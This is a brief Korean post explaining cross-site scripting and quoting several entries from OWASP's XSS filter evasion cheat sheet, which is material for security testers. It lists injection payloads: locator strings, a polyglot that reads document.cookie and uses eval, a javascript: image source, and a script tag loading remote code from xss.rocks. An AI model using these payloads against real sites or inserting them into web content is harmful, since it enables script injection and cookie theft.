(XSS 필터 우회 치트 시트 : XSS Filter Evasion Cheat Sheet)

(XSS 필터 우회 치트 시트 : XSS Filter Evasion Cheat Sheet)

크로스 사이트 스크립트(XSS)는 어플리케이션에서 브라우저로 데이터는 전송하는 페이지에서 사용자가 입력한 데이터를 검증하지 않거나, 데이터 출력 시 위험한 데이터를 필터하지 않을 때 발생한다. XSS는 일반적으로 자바스크립트에서 발생 하지만, VB 스크립트등 클라이언트에서 실행되는 동적 데이터를 생성하는 모든 언어에서 발생할 가능성이 있다. 

XSS 취약점을 이용한 악성 스크립트 배포, 악성코드 배포등 개인 및 조직의 보안에 큰 위협이 되고 있다.

아래는 OWASP에서 제공하는 XSS 필터를 우회하기 위한 치트 시트이다. 

1) XSS Locator

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

2) XSS Locator (short)

'';!--"<XSS>=&{()}

3) No Filter Evasion

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

4) Filter bypass based polyglot

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'">
<img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">

5) Image XSS using the JavaScript directive

<IMG SRC="javascript:alert('XSS');">

보다 자세한 내용의 우회 치트 시트는 OWASP XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)를 참고 바란다.